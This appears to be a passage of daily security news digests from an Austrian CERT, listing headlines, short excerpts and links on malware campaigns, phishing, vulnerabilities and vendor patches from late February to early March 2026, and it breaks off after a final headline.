https://www.malwarebytes.com/blog/threat-intel/2026/03/fake-cleanmymac-site-installs-shub-stealer-and-backdoors-crypto-wallets

An Investigation Into Years of Undetected Operations Targeting High-Value Sectors

In-depth analysis of threat activity we call CL-UNK-1068. We discuss their toolset, including tunneling, reconnaissance and credential theft.

https://unit42.paloaltonetworks.com/cl-unk-1068-targets-critical-sectors/

The Hidden Cyber Risks of Remote Work Infrastructure

Hidden cyber risks in remote work include insecure home Wi-Fi, phishing attacks, and data exposure, leaving businesses and employees vulnerable to breaches.

https://hackread.com/hidden-cyber-risks-remote-work-infrastructure/

Avira: Deserialize, Delete and Escalate - The Proper Way to Use an AV

Avira Internet Security ships with a handful of modules that quietly handle privileged operations in the background: software updates, performance monitoring and system cleanup. Each one runs parts of its workflow as SYSTEM. Three of them dont bother checking what they are actually operating on.

http://blog.quarkslab.com/avira-deserialize-delete-and-escalate-the-proper-way-to-use-an-av.html

A GitHub Issue Title Compromised 4,000 Developer Machines

The attack - which Snyk named "Clinejection"2 - composes five well-understood vulnerabilities into a single exploit that requires nothing more than opening a GitHub issue.

https://grith.ai/blog/clinejection-when-your-ai-tool-installs-another

Fake imToken Chrome Extension Steals Seed Phrases via Phishing Redirects

Socket-s Threat Research Team uncovered a malicious Chrome extension, lm-oken Chromophore (extension ID bbhaganppipihlhjgaaeeeefbaoihcgi), that impersonates imToken while presenting itself as a hex color visualizer in the Chrome Web Store. Instead of providing the harmless tool it promises, the extension automatically opens a threat actor-controlled phishing site as soon as it is installed, and again whenever the user clicks it.

https://socket.dev/blog/fake-imtoken-chrome-extension-steals-seed-phrases-via-phishing-redirects

A Satellite Receiver Trusted by Pentagon, ESA Has More Than 20 Security Flaws - and the Maker Never Responded

A penetration tester found more than 20 vulnerabilities in a satellite receiver deployed by the U.S. Department of Defense (also referred to as the Department of War), the European Space Agency, and other critical infrastructure operators worldwide - and the device-s manufacturer, International Data Casting Corporation (IDC), did not respond to a single disclosure attempt over several months.

https://thecyberexpress.com/satellite-receiver-vulnerabilities-unpatched/

Vulnerabilities

WordPress membership plugin bug exploited to create admin accounts

Hackers are exploiting a critical vulnerability in the User Registration & Membership plugin, which is installed on more than 60,000 WordPress sites.

https://www.bleepingcomputer.com/news/security/wordpress-membership-plugin-bug-exploited-to-create-admin-accounts/

Acronis warnt vor zig Sicherheitslücken in Cyber Protect

Vor mehr als 20 Sicherheitslücken in Cyber Protect warnt Acronis aktuell. Admins sollten bereitstehende Updates rasch anwenden.

https://www.heise.de/news/Acronis-Cyber-Protect-Zig-Schwachstellen-gefaehrden-Unternehmenssoftware-11201761.html

LWN Security updates for Friday

https://lwn.net/Articles/1061738/

Tageszusammenfassung - 05.03.2026

2026-03-05T19:24:39Z

End-of-Day report

Timeframe: Mittwoch 04-03-2026 18:00 - Donnerstag 05-03-2026 18:00 Handler: Michael Schlagenhaufer Co-Handler: Felician Fuchs

News

Mail2Shell zero-click attack lets hackers hijack FreeScout mail servers

A maximum severity vulnerability in the FreeScout helpdesk platform allows hackers to achieve remote code execution without any user interaction or authentication. [..] The flaw is tracked as CVE-2026-28289 and bypasses a fix for another remote code execution (RCE) security issue (CVE-2026-27636) that could be exploited by authenticated users with upload permissions.

https://www.bleepingcomputer.com/news/security/mail2shell-zero-click-attack-lets-hackers-hijack-freescout-mail-servers/

Kritische Sicherheitslücken in Cisco Secure Firewall Produkten - Updates verfügbar

Cisco hat am 4. März 2026 mehrere Advisories veröffentlicht, die insgesamt 17 Schwachstellen in Cisco Secure Firewall Adaptive Security Appliance (ASA) Software, Cisco Secure Firewall Threat Defense (FTD) Software und Cisco Secure Firewall Management Center (FMC) Software adressieren.

https://www.cert.at/de/warnungen/2026/3/kritische-sicherheitslucken-in-cisco-secure-firewall-produkten-updates-verfugbar

Google says 90 zero-days were exploited in attacks last year

Google Threat Intelligence Group (GTIG) tracked 90 zero-day vulnerabilities actively exploited throughout 2025, almost half of them in enterprise software and appliances.

https://www.bleepingcomputer.com/news/security/google-says-90-zero-days-were-exploited-in-attacks-last-year/

Malware-laced OpenClaw installers get Bing AI search boost

Think before you download OpenClaw, the AI agent that can manage just about anything, is risky all by itself, but now fake installers for it are wreaking havoc. Users who searched Bing-s AI results for -OpenClaw Windows- were directed to a malicious GitHub repository that delivered information stealers and GhostSocks onto their machines.

https://go.theregister.com/feed/www.theregister.com/2026/03/04/fake_openclaw_installers_malware/

Cybercrime: Behörden schalten das Datenleak-Forum LeakBase ab

Nach der Beschlagnahmung der LeakBase-Datenbank, einem der weltweit größten Cybercrime-Foren, identifizierten und verhafteten die Behörden mehrere Verdächtige.

https://www.heise.de/news/Cybercrime-Behoerden-schalten-das-Datenleak-Forum-LeakBase-ab-11199616.html

Europäische Strafverfolger zerschlagen Phishing-Plattform

Tycoon2FA gehörte zu den weltweit größten Phishing-Operationen. Sie ermöglichte Kriminellen unbemerkten Zugriff auf E-Mail-Konten. Nun wurde sie abgeschaltet.

https://www.heise.de/news/Europaeische-Strafverfolgungsbehoerden-zerschlagen-Phishing-Plattform-11199550.html

New BoryptGrab Stealer Targets Windows Users via Deceptive GitHub Pages

The BoryptGrab campaign illustrates an evolving threat ecosystem targeting users through deceptive software downloads and fake GitHub repositories. Across its many variants, the stealer demonstrates extensive data-harvesting capabilities, with its ability to dynamically stage payloads, bypass analysis through anti-VM and anti-debug checks and offload sensitive operations to encrypted payloads showing a level of engineering sophistication that continues to increase.

https://www.trendmicro.com/en_us/research/26/c/boryptgrab-stealer-targets-users-via-deceptive-github-pages.html

Fake Zoom, Teams Meeting Invites Use Compromised Certificates to Drop Malware

A new phishing campaign is using stolen certificates from TrustConnect Software PTY LTD to sign malware. By impersonating updates for Zoom and Microsoft Teams, hackers install RMM tools to gain persistent, privileged access to networks.

https://hackread.com/fake-zoom-teams-invites-malware-certificates/

Cyberangriffe im Jahr 2026: Der Login als Waffe

Cyberkriminelle und nationalstaatliche Akteure verlagern ihren Fokus zunehmend weg vom aufwendigen Eindringen in Systeme, wie aus Cloudflares Bedrohungsbericht 2026 hervorgeht. Stattdessen setzen sie eher auf das effizientere Einloggen mit gestohlenen Zugangsdaten.

https://heise.de/-11200132

Vulnerabilities

Drupal: AJAX Dashboard - Critical - Access bypass - SA-CONTRIB-2026-022

https://www.drupal.org/sa-contrib-2026-022

Drupal: Google Analytics GA4 - Moderately critical - Cross-site Scripting - SA-CONTRIB-2026-024

https://www.drupal.org/sa-contrib-2026-024

LWN: Security updates for Thursday

https://lwn.net/Articles/1061464/

Tageszusammenfassung - 04.03.2026

2026-03-04T18:56:43Z

End-of-Day report

Timeframe: Dienstag 03-03-2026 18:00 - Mittwoch 04-03-2026 18:00 Handler: Guenes Holler Co-Handler: Michael Schlagenhaufer

News

Fake Tech Support Spam Deploys Customized Havoc C2 Across Organizations

The intrusions, identified by Huntress last month across five partner organizations, involved the threat actors using email spam as lures, followed by a phone call from an IT desk that activates a layered malware delivery pipeline.

https://thehackernews.com/2026/03/fake-tech-support-spam-deploys.html

Angriffe auf VMware Aria Operations beobachtet

In der vergangenen Woche hatte Broadcom eine Warnung veröffentlicht, die Sicherheitslecks in VMware Aria Operations betraf. Die Software kommt auch in Cloud Foundation, Telco Cloud Platform, Telco Cloud Infrastructure und vSphere Foundation zum Einsatz, sodass auch diese verwundbar sind. Die CISA meldet nun Angriffe auf eine Schwachstelle, die nicht authentifizierten Akteuren das Ausführen beliebiger Befehle und in der Folge von beliebigem Schadcode aus dem Netz in VMware Aria Operations ermöglicht.

https://www.heise.de/news/Angriffe-auf-VMware-Aria-Operations-beobachtet-11198060.html

ESC-Tickets: Hohes Risiko bei Kauf über hellotickets.de!

Bis zum großen Spektakel des Eurovision Song Contest (ESC) sind es noch knapp zwei Monate. Alle Shows sind bereits ausverkauft. Dennoch werden auf der Website hellotickets.de vermeintlich weiterhin Eintrittskarten angeboten.

https://www.watchlist-internet.at/news/esc-tickets-hohes-risiko-helloticketsde/

Telegram Increasingly Used to Sell Access, Malware and Stolen Logs

Cybercriminals are now increasingly using Telegram to sell corporate access, malware subscriptions, and stealer logs, turning the messaging app into a fast cybercrime hub.

https://hackread.com/telegram-used-sell-access-malware-stolen-logs/

Vulnerabilities

Cisco Security Advisories 2026 Mar 04

On March 4, 2026, Cisco released 27 new security advisories. Two of these advisories impact the Cisco Firewall Management Center and have been classified as critical (Authentication Bypass CVE-2026-20079 and Remote Code Execution CVE-2026-20131).

https://sec.cloudapps.cisco.com/security/center/publicationListing.x

Vulnerability & Patch Roundup - February 2026

To help educate website owners about potential threats to their environments, we-ve compiled a list of important security updates and vulnerability patches for the WordPress ecosystem this past month.

https://blog.sucuri.net/2026/02/vulnerability-patch-roundup-february-2026.html

LWN: Security updates for Wednesday

https://lwn.net/Articles/1061295/

[R1] Nessus Manager Versions 10.10.3 and 10.11.3 Fix One Vulnerability

https://www.tenable.com/security/tns-2026-08

Tageszusammenfassung - 03.03.2026

2026-03-03T19:25:44Z

End-of-Day report

Timeframe: Montag 02-03-2026 18:00 - Dienstag 03-03-2026 18:00 Handler: Felician Fuchs Co-Handler: Michael Schlagenhaufer

News

LLMs can unmask pseudonymous users at scale with surprising accuracy

Pseudonymity has never been perfect for preserving privacy. Soon it may be pointless.

https://arstechnica.com/security/2026/03/llms-can-unmask-pseudonymous-users-at-scale-with-surprising-accuracy/

Fake Google Security site uses PWA app to steal credentials, MFA codes

A phishing campaign is using a fake Google Account security page to deliver a web-based app capable of stealing one-time passcodes, harvesting cryptocurrency wallet addresses, and proxying attacker traffic through victims browsers.

https://www.bleepingcomputer.com/news/security/fake-google-security-site-uses-pwa-app-to-steal-credentials-mfa-codes/

Microsoft Warns OAuth Redirect Abuse Delivers Malware to Government Targets

Microsoft on Monday warned of phishing campaigns that employ phishing emails and OAuth URL redirection mechanisms to bypass conventional phishing defenses implemented in email and browsers. The activity, the company said, targets government and public-sector organizations with the end goal of redirecting victims to attacker-controlled infrastructure without stealing their tokens.

https://thehackernews.com/2026/03/microsoft-warns-oauth-redirect-abuse.html

Open-Source CyberStrikeAI Deployed in AI-Driven FortiGate Attacks Across 55 Countries

The threat actor behind the recently disclosed artificial intelligence (AI)-assisted campaign targeting Fortinet FortiGate appliances leveraged an open-source, AI-native security testing platform called CyberStrikeAI to execute the attacks.

https://thehackernews.com/2026/03/open-source-cyberstrikeai-deployed-in.html

Until last month, attackers couldve stolen info from Perplexity Comet users just by sending a calendar invite

AI browsing agent left local files open for the taking If you wanted to steal local files from someone using Perplexitys Comet browser, until last month you could just schedule the theft by sending your victim a calendar event.

https://www.theregister.com/2026/03/03/perplexity_comet_browser_hole_cal_invite/

Breaking Out of Citrix and other Restricted Desktop Environments

Many organisations are turning to virtualisation of apps and desktops. This often involves virtualisation platforms such as Citrix to deliver these services. Get your configuration or lock-down wrong and you-ll find users -breaking out- of the environment you thought you had secured.

https://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/

Fake-Hotelwebsite als Basis für Kombi-Betrugsmasche

Über den gefälschten Online-Auftritt eines Hotels versuchen Kriminelle an die Kontaktdaten und (vermutlich) das Geld ihrer Opfer zu gelangen. Zusätzlich nutzen sie die Domain der Fake-Seite für den Versand von Phishing-Mails.

https://www.watchlist-internet.at/news/fake-hotelwebsite-kombi-betrugsmasche/

Anonymous credentials: an illustrated primer

This post has been on my back burner for well over a year. This has bothered me, because every month that goes by I become more convinced that anonymous authentication the most important topic we could be talking about as cryptographers. This is because I-m very worried that we-re headed into a bit of a privacy dystopia, driven largely by bad legislation and the proliferation of AI.

https://blog.cryptographyengineering.com/2026/03/02/anonymous-credentials-an-illustrated-primer/

Threat Brief: March 2026 Escalation of Cyber Risk Related to Iran

Unit 42 details recent Iranian cyberattack activity, sharing direct observations of phishing, hacktivist activity and cybercrime. We include recommendations for defenders.

https://unit42.paloaltonetworks.com/iranian-cyberattacks-2026/

Silver Dragon: China Nexus Cyber Espionage Group Targeting Governments in Asia and Europe

Silver Dragon is a China nexus cyber espionage group targeting government ministries and public sector organizations across Southeast Asia, with additional victims identified in Europe. The group gains initial access through exploitation of public-facing servers and targeted phishing campaigns aimed at government entities.

https://blog.checkpoint.com/research/silver-dragon-china-nexus-cyber-espionage-group-targeting-governments-in-asia-and-europe/

Hackers Abuse .arpa Top-Level Domain to Host Phishing Scams

Hackers abuse the .arpa Top-Level Domain to host phishing scams, using IPv6 tunnels, reverse DNS tricks, and shadow domains to bypass security checks.

https://hackread.com/hackers-arpa-top-level-domain-phishing-scams/

Coruna: The Mysterious Journey of a Powerful iOS Exploit Kit

Google Threat Intelligence Group (GTIG) has identified a new and powerful exploit kit targeting Apple iPhone models running iOS version 13.0 (released in September 2019) up to version 17.2.1 (released in December 2023). The exploit kit, named -Coruna- by its developers, contained five full iOS exploit chains and a total of 23 exploits.

https://cloud.google.com/blog/topics/threat-intelligence/coruna-powerful-ios-exploit-kit/

Analysis of an Integrated Phishing Campaign Utilizing Google Cloud Infrastructure

In recent weeks, a highly organized phishing campaign has surfaced, characterized by its use of legitimate Google infrastructure to bypass standard security filters. I have identified more than 25 distinct phishing emails targeting a single account, all of which ultimately direct users to a specific URL: hxxps://storage[.]googleapis[.]com/whilewait/comessuccess.html.

https://malwr-analysis.com/2026/03/03/analysis-of-an-integrated-phishing-campaign-utilizing-google-cloud-infrastructure/

Sometimes, You Can Just Feel The Security In The Design (Juniper Junos Evolved CVE-2026-21902 Pre-Auth RCE)

On today-s -good news disguised as other things- segment, we-re turning our gaze to CVE-2026-21902 - a recently disclosed -Incorrect Permission Assignment for Critical Resource- vulnerability affecting Juniper-s Junos OS Evolved platform. This vulnerability affects only Juniper-s PTX Series of devices, apparently.

https://labs.watchtowr.com/sometimes-you-can-just-feel-the-security-in-the-design-junos-os-evolved-cve-2026-21902-rce/

Vulnerabilities

Gefährliche Sicherheitslücke: Angriffe auf Android-Nutzer beobachtet

Eine gefährliche Sicherheitslücke in einer Grafikkomponente von Qualcomm wird aktiv ausgenutzt. Android-Nutzer sollten so bald wie möglich updaten.

https://www.golem.de/news/gefaehrliche-sicherheitsluecke-angriffe-auf-android-nutzer-beobachtet-2603-206025.html

HPE AutoPass License Server erlaubt Umgehung der Authentifizierung

HPE warnt vor einer gravierenden Sicherheitslücke im HPE AutoPass Lizenzserver (APLS). Die Authentifizierung lässt sich umgehen.

https://www.heise.de/news/HPE-AutoPass-License-Server-erlaubt-Umgehung-der-Authentifizierung-11196562.html

HCL BigFix: Angreifer können auf Daten im Dateisystem zugreifen

Die Endpoint-Management-Plattform HCL BigFix ist verwundbar. Sicherheitsupdates sind verfügbar.

https://www.heise.de/news/HCL-BigFix-Angreifer-koennen-auf-Daten-im-Dateisystem-zugreifen-11196966.html

LWN Security updates for Tuesday

https://lwn.net/Articles/1061043/

Tageszusammenfassung - 02.03.2026

2026-03-02T19:26:53Z

End-of-Day report

Timeframe: Freitag 27-02-2026 18:00 - Montag 02-03-2026 18:00 Handler: Felician Fuchs Co-Handler: Michael Schlagenhaufer

News

Microsoft testing Windows 11 batch file security improvements

Microsoft is rolling out new Windows 11 Insider Preview builds that improve security and performance during batch file or CMD script execution.

https://www.bleepingcomputer.com/news/microsoft/microsoft-testing-windows-11-batch-file-security-improvements/

QuickLens Chrome extension steals crypto, shows ClickFix attack

A Chrome extension named "QuickLens - Search Screen with Google Lens" has been removed from the Chrome Web Store after it was compromised to push malware and attempt to steal crypto from thousands of users.

https://www.bleepingcomputer.com/news/security/quicklens-chrome-extension-steals-crypto-shows-clickfix-attack/

UK warns of Iranian cyberattack risks amid Middle-East conflict

The United Kingdoms National Cyber Security Centre (NCSC) alerted British organizations to a heightened risk of Iranian cyberattacks amid the ongoing conflict in the Middle East.

https://www.bleepingcomputer.com/news/security/uk-warns-of-iranian-cyberattack-risks-amid-middle-east-conflict/

A fake FileZilla site hosts a malicious download

A tampered copy of FileZilla quietly contacts attacker-controlled servers using encrypted DNS traffic that can slip past traditional monitoring.

https://www.malwarebytes.com/blog/threat-intel/2026/03/a-fake-filezilla-site-hosts-a-malicious-download

FinanzOnline-Phishing: Kriminelle drohen mit Hausratpfändung

Oh Schreck: Eine Pfändung des Hausrats droht, weil ein offener Betrag trotz mehrerer Mahnungen nicht bezahlt worden sein soll. Genau das behauptet derzeit eine E-Mail, die angeblich von FinanzOnline stammt. Tatsächlich handelt es sich dabei aber nicht um eine echte Zahlungsaufforderung.

https://www.watchlist-internet.at/news/finanzonline-phishing-hausratpfaendung/

Taming Agentic Browsers: Vulnerability in Chrome Allowed Extensions to Hijack New Gemini Panel

A high-severity CVE-2026-0628 in Chromes Gemini allowed local file access and privacy invasion. Google quickly patched the flaw.

https://unit42.paloaltonetworks.com/gemini-live-in-chrome-hijacking/

Active Reconnaissance Campaign Targets SonicWall Firewalls Through Commercial Proxy Infrastructure

84,000+ scanning sessions targeting SonicWall SonicOS infrastructure in four days. GreyNoise details a coordinated reconnaissance campaign using rotating proxy infrastructure.

https://www.greynoise.io/blog/active-reconnaissance-campaign-targets-sonicwall-firewalls-through-commercial-proxy-infrastructure

Cultivating a robust and efficient quantum-safe HTTPS

Today we're announcing a new program in Chrome to make HTTPS certificates secure against quantum computers. The Internet Engineering Task Force (IETF) recently created a working group, PKI, Logs, And Tree Signatures (-PLANTS-), aiming to address the performance and bandwidth challenges that the increased size of quantum-resistant cryptography introduces into TLS connections requiring Certificate Transparency (CT).

https://security.googleblog.com/2026/02/cultivating-robust-and-efficient.html

Stop Putting Secrets in .env Files

[..] Why do we still store credentials in plaintext .env files?

https://jonmagic.com/posts/stop-putting-secrets-in-dotenv-files/

Fooling Gos X.509 Certificate Verification

Below are two X.509 certificates. The first is the Certificate Authority (CA) root certificate, and the second is a leaf certifcate signed by the private key of the CA.

https://danielmangum.com/posts/fooling-go-x509-certificate-verification/

Agents attacking agents: AI-powered bot exploiting GitHub Actions

A week-long automated attack campaign targeted CI/CD pipelines across major open source repositories, achieving remote code execution in multiple targets. The attacker, an autonomous bot called hackerbot-claw, used 5 different exploitation techniques and successfully exfiltrated a GitHub token with write permissions from one of the most popular repositories on GitHub.

https://www.stepsecurity.io/blog/hackerbot-claw-github-actions-exploitation

Vulnerabilities

Checkmk: Hochriskante Cross-Site-Scripting-Lücke in Netzwerk-Monitor-Software

Die Entwickler haben aktualisierte Checkmk-Versionen herausgegeben. Sie schließen eine mindestens hochriskante Cross-Site-Scripting-Lücke.

https://www.heise.de/news/Checkmk-Hochriskante-Cross-Site-Scripting-Luecke-in-Netzwerk-Monitor-Software-11194483.html

Unauthorized AI Agent Execution Code Published to OpenVSX in Aqua Trivy VS Code Extension

On February 27 and 28, 2026, versions 1.8.12 and 1.8.13 of the Aqua Trivy VS Code extension were published to the OpenVSX registry under the aquasecurityofficial.trivy-vulnerability-scanner namespace. Socket identified suspicious behavior in these versions shortly after publication and began investigating the releases.

https://socket.dev/blog/unauthorized-ai-agent-execution-code-published-to-openvsx-in-aqua-trivy-vs-code-extension

LWN Security updates for Monday

https://lwn.net/Articles/1060911/

Tageszusammenfassung - 27.02.2026

2026-02-27T18:28:56Z

End-of-Day report

Timeframe: Donnerstag 26-02-2026 18:00 - Freitag 27-02-2026 18:00 Handler: Wolfgang Menezes Co-Handler: n/a

News

New AirSnitch attack bypasses Wi-Fi encryption in homes, offices, and enterprises

New research shows that behaviors that occur at the very lowest levels of the network stack make encryption-in any form, not just those that have been broken in the past-incapable of providing client isolation, an encryption-enabled protection promised by all router makers, that is intended to block direct communication between two or more connected clients. The isolation can effectively be nullified through AirSnitch, the name the researchers gave to a series of attacks that capitalize on the newly discovered weaknesses.

https://arstechnica.com/security/2026/02/new-airsnitch-attack-breaks-wi-fi-encryption-in-homes-offices-and-enterprises/

Log4j am Limit: KI-Schrott lähmt Open-Source-Projekt

Über das Bug-Bounty-Programm des Projekts werden den Angaben zufolge immer mehr KI-generierte Schwachstellenmeldungen eingereicht. [..] Karwasz schlägt vor, Schwachstellenmeldungen bei Log4j in Zukunft kurzfristig Prioritäten zuzuordnen und vorerst nur noch die wichtigen Fälle zu bearbeiten.

https://www.golem.de/news/log4j-am-limit-ki-schrott-laehmt-open-source-projekt-2602-205903.html

Heimliches Fahrzeug-Tracking: Spionage durch das Reifendruckkontrollsystem

Reifendruckkontrollsysteme moderner Fahrzeuge bieten Spionen weitreichende Möglichkeiten zur Überwachung - und das schon seit etlichen Jahren. [..] Angriffspunkt sind nach Angaben der Forscher Funksignale, die von den TPMS ausgestrahlt werden und eine eindeutige Kennung enthalten. [..] Um Autos anhand der TPMS-Signale zu tracken, wird nach Angaben der Forscher nur ein einfacher Funkempfänger benötigt, der zu Preisen von lediglich rund 100 US-Dollar erhältlich ist. [..] "Solche Informationen könnten Aufschluss über tägliche Routinen geben, wie beispielsweise Arbeitszeiten oder Reisegewohnheiten" , warnte das Forschungsteam.

https://www.golem.de/news/heimliches-fahrzeug-tracking-spionage-durch-das-reifendruckkontrollsystem-2602-205913.html

Trojanized Gaming Tools Spread Java-Based RAT via Browser and Chat Platforms

Threat actors are luring unsuspecting users into running trojanized gaming utilities that are distributed via browsers and chat platforms to distribute a remote access trojan (RAT). "A malicious downloader staged a portable Java runtime and executed a malicious Java archive (JAR) file named jd-gui.jar," the Microsoft Threat Intelligence team said in a post on X.

https://thehackernews.com/2026/02/trojanized-gaming-tools-spread-java.html

Fake Zoom and Google Meet scams install Teramind: A technical deep dive

In this article, we-ll provide the deeper technical analysis [..] On February 24, 2026, we published an article about how a fake Zoom meeting -update- silently installs monitoring software, documenting a campaign that used a convincing fake Zoom waiting room to push a legitimate Teramind installer abused for unauthorized surveillance onto Windows machines. [..] Despite the takedown, our continued monitoring shows the campaign is not only still active but growing: we have now identified a parallel operation impersonating Google Meet, running from a different domain and infrastructure.

https://www.malwarebytes.com/blog/threat-intel/2026/02/fake-zoom-and-google-meet-scams-install-teramind-a-technical-deep-dive

Hook, line, and vault: A technical deep dive into the 1Phish kit

We analyze the evolution of the 1Phish phishing kit from a basic credential harvester into an MFA-aware, multi-stage phishing kit targeting 1Password users.

https://securitylabs.datadoghq.com/articles/hook-line-vault-a-deep-dive-into-1phish/

Malicious Go -crypto- Module Steals Passwords and Deploys Rekoobe Backdoor

Socket-s Threat Research Team uncovered a malicious Go module, github[.]com/xinfeisoft/crypto, that imitates the legitimate golang.org/x/crypto codebase but inserts a backdoor in ssh/terminal/terminal.go. That choice was strategic: golang.org/x/crypto is one of the Go ecosystem-s foundational cryptography codebases, maintained by the Go project and widely relied on for primitives and packages such as bcrypt, argon2, chacha20, and ssh, which makes it a high-trust impersonation target in dependency graphs.

https://socket.dev/blog/malicious-go-crypto-module-steals-passwords-and-deploys-rekoobe-backdoor

Vulnerabilities

GitLab Patch Release: 18.9.1, 18.8.5, 18.7.5

These versions contain important bug and security fixes, and we strongly recommend that all self-managed GitLab installations be upgraded to one of these versions immediately. GitLab.com is already running the patched version. GitLab Dedicated customers do not need to take action.

https://about.gitlab.com/releases/2026/02/25/patch-release-gitlab-18-9-1-released/

LWN: Security updates for Friday

https://lwn.net/Articles/1060645/

Tageszusammenfassung - 26.02.2026

2026-02-26T19:04:16Z

End-of-Day report

Timeframe: Mittwoch 25-02-2026 18:00 - Donnerstag 26-02-2026 18:00 Handler: Michael Schlagenhaufer Co-Handler: Felician Fuchs

News

Fake Next.js job interview tests backdoor developers devices

The Microsoft Defender team has discovered a coordinated campaign targeting software developers through malicious repositories posing as legitimate Next.js projects and technical assessment materials, including recruiting coding tests.

https://www.bleepingcomputer.com/news/security/fake-nextjs-job-interview-tests-backdoor-developers-devices/

Ransomware payment rate drops to record low as attacks surge

The number of ransomware victims paying threat actors has dropped to 28% last year, an all-time low, despite a significant increase in the number of claimed attacks.

https://www.bleepingcomputer.com/news/security/ransomware-payment-rate-drops-to-record-low-despite-attack-surge/

Datenpanne mit Openclaw: KI-Agent leakt interne Daten einer Cybersecurityfirma

Abermals ist es in Verbindung mit einem KI-Agenten zu einer Datenpanne gekommen. Der Betreiber hat offenbar zu viele Zugriffsrechte eingeräumt.

https://www.golem.de/news/datenpanne-mit-openclaw-ki-agent-leakt-interne-daten-einer-cybersecurityfirma-2602-205873.html

Finding Signal in the Noise: Lessons Learned Running a Honeypot with AI Assistance [Guest Diary], (Tue, Feb 24th)

Over the past several months, I have gained practical insight into the challenges of deploying and operating a honeypot, even within a relatively simple environment. This work highlighted how varying hardware, software, and network design-can significantly alter outcomes. Through this process, I observed both the value and the limitations of log collection.

https://isc.sans.edu/diary/rss/32744

Malicious StripeApi NuGet Package Mimicked Official Library and Stole API Tokens

Cybersecurity researchers have disclosed details of a new malicious package discovered on the NuGet Gallery, impersonating a library from financial services firm Stripe in an attempt to target the financial sector. The package, codenamed StripeApi.Net, attempts to masquerade as Stripe.net, a legitimate library from Stripe that has over 75 million downloads.

https://thehackernews.com/2026/02/malicious-stripeapi-nuget-package.html

UAT-10027 Targets U.S. Education and Healthcare with Dohdoor Backdoor

A previously undocumented threat activity cluster has been attributed to an ongoing malicious campaign targeting education and healthcare sectors in the U.S. since at least December 2025.The campaign is being tracked by Cisco Talos under the moniker UAT-10027. The end goal of the attacks is to deliver a never-before-seen backdoor codenamed Dohdoor.

https://thehackernews.com/2026/02/uat-10027-targets-us-education-and.html

APT37 Adds New Capabilities for Air-Gapped Networks

In December 2025, Zscaler ThreatLabz discovered a campaign linked to APT37 (also known as ScarCruft, Ruby Sleet, and Velvet Chollima), which is a DPRK-backed threat group. In this campaign, tracked as Ruby Jumper by ThreatLabz, APT37 uses Windows shortcut (LNK) files to initiate an attack that utilizes a set of newly discovered tools. These tools, RESTLEAF, SNAKEDROPPER, THUMBSBD, and VIRUSTASK, download a payload that delivers FOOTWINE and BLUELIGHT, which enable surveillance on a victim-s system.

https://www.zscaler.com/blogs/security-research/apt37-adds-new-capabilities-air-gapped-networks

Microsoft Authenticator stellt Funktion bei erkanntem Jailbreak/Root-Zugriff ein

Microsoft kündigt an, dass die Authenticator-App Jailbreaks und Rootzugang erkennen soll. Entra-Zugänge sollen dann gelöscht werden.

https://www.heise.de/news/Microsoft-Authenticator-bekommt-Jailbreak-und-Root-Erkennung-11190598.html

Apache ActiveMQ Exploit Leads to LockBit Ransomware

This intrusion began in mid-February 2024 after a threat actor exploited a vulnerability (CVE-2023-46604) on an exposed Apache ActiveMQ server. The threat actor was able to perform remote code execution (RCE) by using a Java Spring class and a custom Java Spring bean configuration XML file.

https://thedfirreport.com/2026/02/23/apache-activemq-exploit-leads-to-lockbit-ransomware/

EWS-Apps und deren Nutzung vor der EWS-Abschaltung identifizieren

Microsoft ist dabei, Exchange Web Services (EWS) in den Ruhestand zu schicken. Dieser Vorgang beginnt im Oktober 2026 und endet mit einer vollständigen Abschaltung von EWS im Jahr 2027.

https://borncity.com/blog/2026/02/26/ews-apps-und-deren-nutzung-vor-der-ews-abschaltung-identifizieren/

Buy A Help Desk, Bundle A Remote Access Solution? (SolarWinds Web Help Desk Pre-Auth RCE Chain(s))

It-s been a while, but we-re back - in time for story time. Gather round, strap in, and prepare for another depressing journey of -all we wanted to do was reproduce an N-day, and here we are with 0-days-.

https://labs.watchtowr.com/buy-a-help-desk-bundle-a-remote-access-solution-solarwinds-web-help-desk-pre-auth-rce-chain-s/

Vulnerabilities

Kritische Sicherheitslücken in Cisco Catalyst SD-WAN - aktiv ausgenutzt - Updates verfügbar

26. Februar 2026 Beschreibung In Cisco Catalyst SD-WAN existieren mehrere kritische Sicherheitslücken. Die schwerwiegendste Schwachstelle (CVE-2026-20127) ermöglicht es einem nicht authentifizierten Angreifer aus der Ferne, die Authentifizierung zu umgehen und administrative Berechtigungen auf einem betroffenen System zu erlangen. Weitere Schwachstellen betreffen den Cisco Catalyst SD-WAN Manager und ermöglichen unter anderem Authentication Bypass, Privilege Escalation,

https://www.cert.at/de/warnungen/2026/2/kritische-sicherheitslucken-in-cisco-catalyst-sd-wan-aktiv-ausgenutzt-updates-verfugbar

Critical Juniper Networks PTX flaw allows full router takeover

A critical vulnerability in the Junos OS Evolved network operating system running on PTX Series routers from Juniper Networks could allow an unauthenticated attacker to execute code remotely with root privileges.

https://www.bleepingcomputer.com/news/security/critical-juniper-networks-ptx-flaw-allows-full-router-takeover/

Automatisierungs-Tool n8n: Angreifer können Schadcode einschleusen

Im Automatisierungs-Tool n8n klaffen elf Sicherheitslücken. Davon gelten drei als kritisches Risiko. Admins sollten rasch aktualisieren.

https://www.heise.de/news/Automatisierungs-Tool-n8n-Updates-stopfen-Codeschmuggel-Lecks-11190464.html

LWN Security updates for Thursday

https://lwn.net/Articles/1060391/

Tageszusammenfassung - 25.02.2026

2026-02-25T19:43:02Z

End-of-Day report

Timeframe: Dienstag 24-02-2026 18:00 - Mittwoch 25-02-2026 18:00 Handler: Felician Fuchs Co-Handler: Guenes Holler

News

1Campaign platform helps malicious Google ads evade detection

A newly identified cybercrime service known as 1Campaign is enabling threat actors to run malicious Google Ads that remain online for extended periods while evading scrutiny from security researchers.

https://www.bleepingcomputer.com/news/security/1campaign-platform-helps-malicious-google-ads-evade-detection/

Phishing campaign targets freight and logistics orgs in the US, Europe

A financially motivated threat group dubbed "Diesel Vortex" is stealing credentials from freight and logistics operators in the U.S. and Europe in phishing attacks using 52 domains.

https://www.bleepingcomputer.com/news/security/phishing-campaign-targets-freight-and-logistics-orgs-in-the-us-europe/

The OpenClaw Hype: Analysis of Chatter from Open-Source Deep and Dark Web

OpenClaw has sparked heavy Telegram and dark web chatter, but Flares data shows more research hype than mass exploitation. Flare explains how its telemetry found real supply-chain risk in the skills marketplace, yet limited signs of large-scale criminal operationalization.

https://www.bleepingcomputer.com/news/security/the-openclaw-hype-analysis-of-chatter-from-open-source-deep-and-dark-web/

Marquis sues SonicWall over backup breach that led to ransomware attack

